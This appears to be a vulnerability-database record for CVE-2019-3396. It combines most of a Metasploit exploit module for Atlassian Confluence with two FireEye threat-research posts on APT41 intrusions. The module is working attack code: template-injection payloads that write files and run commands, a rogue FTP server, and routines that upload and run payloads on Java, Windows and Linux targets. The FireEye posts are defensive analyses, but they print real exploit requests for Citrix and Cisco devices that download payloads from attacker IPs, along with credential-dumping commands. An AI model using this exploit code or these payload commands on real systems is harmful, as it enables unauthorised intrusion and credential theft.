\n'Description' => %q{ \nWidget Connector Macro is part of Atlassian Confluence Server and Data Center that \nallows embedding online videos, slideshows, photostreams and more directly into a page. \nA _template parameter can be used to inject remote Java code into a Velocity template, \nand gain code execution. Authentication is not required to exploit this vulnerability. \nBy default, the Java payload will be used because it is cross-platform, but you can also \nspecify which native payload you want (Linux or Windows). \n \nConfluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version \n6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. \n \nThis vulnerability was originally discovered by Daniil Dmitriev \nhttps://twitter.com/ddv_ua. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniil Dmitriev', # Discovering vulnerability \n'Dmitry (rrock) Shchannikov' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2019-3396' ], \n[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], \n[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], \n[ 'URL', 'https://paper.seebug.org/886/'] \n], \n'Targets' => \n[ \n[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], \n[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], \n[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] \n], \n'DefaultOptions' => \n{ \n'RPORT' => 8090, \n'SRVPORT' => 8021, \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 25 2019', \n'DefaultTarget' => 0, \n'Stance' => Msf::Exploit::Stance::Aggressive \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to Confluence', '/']), \nOptString.new('TRIGGERURL', [true, 'URL of an external video service used to trigger the vulnerability', \n'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) \n]) \nend \n \n# Handles the ftp RETR command. 
\n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] RETR argument. \n# @return [void] \ndef on_client_command_retr(c, arg) \nvprint_status(\"FTP download request for #{arg}\") \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \n \nc.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\") \ncase arg \nwhen /check\\.vm$/ \nconn.put(wrap(get_check_vm)) \nwhen /javaprop\\.vm$/ \nconn.put(wrap(get_javaprop_vm)) \nwhen /upload\\.vm$/ \nconn.put(wrap(get_upload_vm)) \nwhen /exec\\.vm$/ \nconn.put(wrap(get_exec_vm)) \nelse \nconn.put(wrap(get_dummy_vm)) \nend \nc.put(\"226 Transfer complete.\\r\\n\") \nconn.close \nend \n \n# Handles the ftp PASS command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] PASS argument. \n# @return [void] \ndef on_client_command_pass(c, arg) \n@state[c][:pass] = arg \nvprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\") \nc.put \"230 Login OK\\r\\n\" \nend \n \n# Handles the ftp EPSV command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] EPSV argument. \n# @return [void] \ndef on_client_command_epsv(c, arg) \nvprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\") \nc.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\") \nend \n \n# Returns an upload template. \n# \n# @return [String] \ndef get_upload_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) \nEOF \n) \nend \n \n# Returns a command execution template. 
\n# \n# @return [String] \ndef get_exec_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() \nEOF \n) \nend \n \n# Returns the check template. \n# \n# @return [String] \ndef get_check_vm \n( \n<<~EOF \n#{@check_text} \nEOF \n) \nend \n \n# Returns the Java system property lookup template. \n# \n# @return [String] \ndef get_javaprop_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() \nEOF \n) \nend \n \n# Returns an empty dummy template. \n# \n# @return [String] \ndef get_dummy_vm \n( \n<<~EOF \nEOF \n) \nend \n \n# Checks the vulnerability. \n# \n# @return [Array] Check code \ndef check \ncheckcode = Exploit::CheckCode::Safe \nbegin \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \n@check_text = Rex::Text.rand_text_alpha(5..10) \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\") \nif res && res.body && res.body.include?(@check_text) \ncheckcode = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \ncheckcode = Exploit::CheckCode::Unknown \nend \ncheckcode \nend \n \n# Injects Java code into the template. \n# \n# @param service_url [String] Address of the template to inject. 
\n# @return [void] \ndef inject_template(service_url, timeout=20) \n \nuri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'headers' => { \n'Accept' => '*/*', \n'Origin' => full_uri(vhost_uri: true) \n}, \n'ctype' => 'application/json; charset=UTF-8', \n'data' => { \n'contentId' => '1', \n'macro' => { \n'name' => 'widget', \n'body' => '', \n'params' => { \n'url' => datastore['TRIGGERURL'], \n'_template' => service_url \n} \n \n} \n}.to_json \n}, timeout=timeout) \n \nunless res \nunless service_url.include?(\"exec.vm\") \nprint_warning('Connection timed out in #inject_template') \nend \nreturn \nend \n \nif res.body.include? 'widget-error' \nprint_error('Failed to inject and execute code:') \nelse \nvprint_status(\"Server response:\") \nend \n \nvprint_line(res.body) \n \nres \nend \n \n# Returns a system property for Java. \n# \n# @param prop [String] Name of the property to retrieve. \n# @return [String] \ndef get_java_property(prop) \n@prop = prop \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\") \nif res && res.body \nreturn clear_response(res.body) \nend \n'' \nend \n \n# Returns the target platform. \n# \n# @return [String] \ndef get_target_platform \nreturn get_java_property('os.name') \nend \n \n# Checks if the target os/platform is compatible with the module target or not. \n# \n# @return [TrueClass] Compatible \n# @return [FalseClass] Not compatible \ndef target_platform_compat?(target_platform) \ntarget.platform.names.each do |n| \nif n.downcase == 'java' || target_platform.downcase.include?(n.downcase) \nreturn true \nend \nend \n \nfalse \nend \n \n# Returns a temp path from the remote target. \n# \n# @return [String] \ndef get_tmp_path \nreturn get_java_property('java.io.tmpdir') \nend \n \n# Returns the Java home path used by Confluence. 
\n# \n# @return [String] \ndef get_java_home_path \nreturn get_java_property('java.home') \nend \n \n# Returns Java code that can be used to inject to the template in order to copy a file. \n# \n# @note The purpose of this method is to have a file that is not busy, so we can execute it. \n# It is meant to be used with #get_write_file_code. \n# \n# @param fname [String] The file to copy \n# @param new_fname [String] The new file \n# @return [void] \ndef get_dup_file_code(fname, new_fname) \nif fname =~ /^\\/[[:print:]]+/ \n@command = \"cp #{fname} #{new_fname}\" \nelse \n@command = \"cmd.exe /C copy #{fname} #{new_fname}\" \nend \n \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \nend \n \n# Returns the normalized file path for the payload. \n# \n# @return [String] \ndef normalize_payload_fname(tmp_path, fname) \n# A quick way to check the platform instead of actually grabbing os.name from the Java system properties. \nif /^\\/[[:print:]]+/ === tmp_path \nRex::FileUtils.normalize_unix_path(tmp_path, fname) \nelse \nRex::FileUtils.normalize_win_path(tmp_path, fname) \nend \nend \n \n# Exploits the target on the Java platform. \n# \n# @return [void] \ndef exploit_as_java \n \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\") \n@b64 = Rex::Text.encode_base64(payload.encoded_jar) \n@command = '' \n \njava_home = get_java_home_path \n \nif java_home.blank? 
\nfail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') \nelse \nvprint_status(\"Found Java home path: #{java_home}\") \nend \n \nregister_files_for_cleanup(@fname) \n \nif /^\\/[[:print:]]+/ === @fname \nnormalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') \n@command = %Q|#{normalized_java_path} -jar #{@fname}| \nelse \nnormalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe') \n@fname.gsub!(/Program Files/, 'PROGRA~1') \n@command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}| \nend \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to execute #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Windows platform. \n# \n# @return [void] \ndef exploit_as_windows \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 
\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \nnew_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \n@fname.gsub!(/Program Files/, 'PROGRA~1') \nnew_fname.gsub!(/Program Files/, 'PROGRA~1') \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Linux platform. \n# \n# @return [void] \ndef exploit_as_linux \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 
\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) \nnew_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \n@command = \"chmod +x #{@fname}\" \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \ndef exploit \n@wrap_marker = Rex::Text.rand_text_alpha(5..10) \n \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \ntarget_platform = get_target_platform \nif target_platform.nil? \nfail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".') \nelse \nprint_status(\"Target being detected as: #{target_platform}\") \nend \n \nunless target_platform_compat?(target_platform) \nfail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') \nend \n \ncase target.name.downcase \nwhen /java$/ \nexploit_as_java \nwhen /windows$/ \nexploit_as_windows \nwhen /linux$/ \nexploit_as_linux \nend \nend \n \n# Wraps request. \n# \n# @return [String] \ndef wrap(string) \n\"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\" \nend \n \n# Returns unwrapped response. 
\n# \n# @return [String] \ndef clear_response(string) \nif match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m) \nreturn match.captures[0] \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152568/confluence_widget_connector.rb.txt"}], "fireeye": [{"lastseen": "2020-11-23T01:53:50", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting them within a matter of days.\n\nOur knowledge of this group\u2019s targets and activities is rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.\n\nIn this blog post, we\u2019re going to examine a recent instance where [FireEye Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) came toe-to-toe with APT41. 
Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection \u2013 protecting our clients\u2019 networks and limiting the threat actor\u2019s ability to gain a foothold and/or prevent data exposure.\n\n#### GET TO DA CHOPPA!\n\nIn April 2019, FireEye\u2019s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting [CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>), a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.\n\n \nFigure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability\n\nThis vulnerability relies on the following actions by the attacker:\n\n * Customizing the _template field to utilize a template that allowed for command execution.\n * Inserting a cmd field that provided the command to be executed.\n\nThrough custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.\n\n \nFigure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396\n\nAs shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. 
Figure 3 provides the code of the file cmd.vm.\n\n \nFigure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system\n\nThe HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a [**China Chopper** webshell](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>).\n\n#### A Passive Aggressive Operation\n\nShortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:\n\n * 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)\n * Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)\n\nBoth files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full [APT41 report](<https://content.fireeye.com/apt-41/rpt-apt41>)).\n\nWithin the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. 
The attacker utilized China Chopper to perform the following:\n\n * Movement of 64.dat and Ins64.exe to C:\\Program Files\\Atlassian\\Confluence\n * Performing a directory listing of C:\\Program Files\\Atlassian\\Confluence\n * Performing a directory listing of C:\\Users\n\nAdditionally, FireEye\u2019s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker\u2019s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.\n\n \nFigure 4: Decoded HIGHNOON commands issued by the attacker\n\n#### Playing Their ACEHASH Card\n\nAs shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script \u2013 \u201cprivilege::debug sekurlsa::logonpasswords exit exit\u201d \u2013 indicate that the unrecovered script was likely a copy of [Invoke-Mimikatz](<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>), reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.\n\nAfter performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\\Program Files\\Atlassian\\Confluence directory:\n\n * c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)\n * F64.data (MD5: a919b4454679ef60b39c82bd686ed141)\n\nThese two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. 
ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).\n\nUpon placing c64.exe and F64.data on the system, the attacker ran the command\n\nc64.exe f64.data \"9839D7F1A0 -m\"\n\nThis specific command provided a password of \u201c9839D7F1A0\u201d to decrypt the contents of F64.data, and a switch of \u201c-m\u201d, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.\n\nUltimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.\n\n#### Key Takeaways From This Incident\n\n * APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.\n * For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.\n * Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. 
Patching of critical vulnerabilities ASAP is crucial to deter active attackers.\n\n#### Detecting the Techniques\n\nFireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.\n\n| **Detection** | **Signature Name** |\n|---|---|\n| **China Chopper** | FE_Webshell_JSP_CHOPPER_1 |\n| | FE_Webshell_Java_CHOPPER_1 |\n| | FE_Webshell_MSIL_CHOPPER_1 |\n| **HIGHNOON.PASSIVE** | FE_APT_Backdoor_Raw64_HIGHNOON_2 |\n| | FE_APT_Backdoor_Win64_HIGHNOON_2 |\n| **Certutil Downloader** | CERTUTIL.EXE DOWNLOADER (UTILITY) |\n| | CERTUTIL.EXE DOWNLOADER A (UTILITY) |\n| **ACEHASH** | FE_Trojan_AceHash |\n\n#### Indicators\n\n| **Type** | **Indicator** | **MD5 Hash (if applicable)** |\n|---|---|---|\n| File | test.jsp | 84d6e4ba1f4268e50810dacc7bbc3935 |\n| File | 64.dat | 51e06382a88eb09639e1bc3565b444a6 |\n| File | Ins64.exe | e42555b218248d1a2ba92c1532ef6786 |\n| File | c64.exe | 846cdb921841ac671c86350d494abf9c |\n| File | F64.data | a919b4454679ef60b39c82bd686ed141 |\n| IP Address | 67.229.97[.]229 | N/A |\n\nLooking for more? [Join us for a webcast](<https://www.brighttalk.com/webcast/7451/366611/double-dragon-apt41-a-dual-espionage-and-cyber-crime-operation>) on August 29, 2019 where we detail more of APT41\u2019s activities. 
You can also find a direct link to the public APT41 report [here](<https://content.fireeye.com/apt-41/rpt-apt41/>).\n\n#### Acknowledgements\n\nSpecial thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.\n", "modified": "2019-08-19T17:30:00", "published": "2019-08-19T17:30:00", "id": "FIREEYE:B394E05FC4834992E8F05135E3087CAD", "href": "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", "type": "fireeye", "title": "GAME OVER: Detecting and Stopping an APT41 Operation", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:51:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189", "CVE-2020-10198"], "description": "Beginning this year, FireEye observed [Chinese actor APT41](<https://content.fireeye.com/apt-41/rpt-apt41/>) carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we\u2019ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. 
It\u2019s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\n\n#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\n\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).\n\n \nFigure 1: Timeline of key events\n\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn\u2019t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. \n\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1 \nHost: [redacted] \nConnection: close \nAccept-Encoding: gzip, deflate \nAccept: */* \nUser-Agent: python-requests/2.22.0 \nNSC_NONCE: nsroot \nNSC_USER: ../../../netscaler/portal/templates/[redacted] \nContent-Length: 96 \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] \n \n--- \n \nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. 
This has been a common activity pattern by Chinese APT groups in past years as well.\n\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor).\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 147 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd**`') %] \n \n--- \n \nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. 
The exploit behavior was almost identical to the activity on February 1, where only the name of the payload \u2018un\u2019 changed.\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 145 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un**`') %] \n \n--- \n \nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nCitrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\n\n#### Cisco Router Exploitation\n\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.\n\nGET /test/fuc \nHTTP/1.1 \nHost: 66.42.98\\\\.220 \nUser-Agent: Wget \nConnection: close \n \n--- \n \nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\n\n66.42.98[.]220 also hosted a file named http://66.42.98[.]220/test/1.txt. 
The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is \u2018cat /etc/flash/etc/nk_sysconfig\u2019, which is the command one would execute on a Cisco RV320 router to display the current configuration.\n\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:\n\n * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)\n * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)\n\n#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\n\nOn March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>) published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>)). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. 
